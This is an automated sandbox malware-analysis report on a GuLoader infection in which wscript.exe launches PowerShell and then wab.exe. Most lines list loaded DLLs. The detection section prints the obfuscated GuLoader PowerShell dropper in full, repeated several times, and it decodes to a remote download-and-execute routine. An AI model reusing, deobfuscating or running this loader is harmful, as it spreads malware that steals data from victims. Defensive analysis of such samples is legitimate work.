            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2122178024.0000000008500000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.2116646966.0000000007667000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000004.00000002.2116646966.0000000007706000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000004.00000002.2116646966.00000000076E2000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal)", "0")
            Yara detected GuLoader
            Source: Yara matchFile source: 00000004.00000002.2125155356.000000000A967000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2123886427.0000000008920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2112300960.0000000005ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2313093176.000001D96966F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Seashells1)$global:Cornett147 = [System.Text.Encoding]::ASCII.GetString($Procline)$global:Patellula=$Cornett147.substring(305164,29054)<#Blotless Lensstyres objet Spermatozoal #>$Foo
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Streptaster $Nanocephalus $kalkuleres), (Superassuming @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Plantings = [AppDomain]::CurrentDomain.GetAssemblies
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Bispernes57)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Dvrgpilens, $false).DefineType($Endoproct, $T
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Seashells1)$global:Cornett147 = [System.Text.Encoding]::ASCII.GetString($Procline)$global:Patellula=$Cornett147.substring(305164,29054)<#Blotless Lensstyres objet Spermatozoal #>$Foo
            Suspicious powershell command line found
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavegaJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla 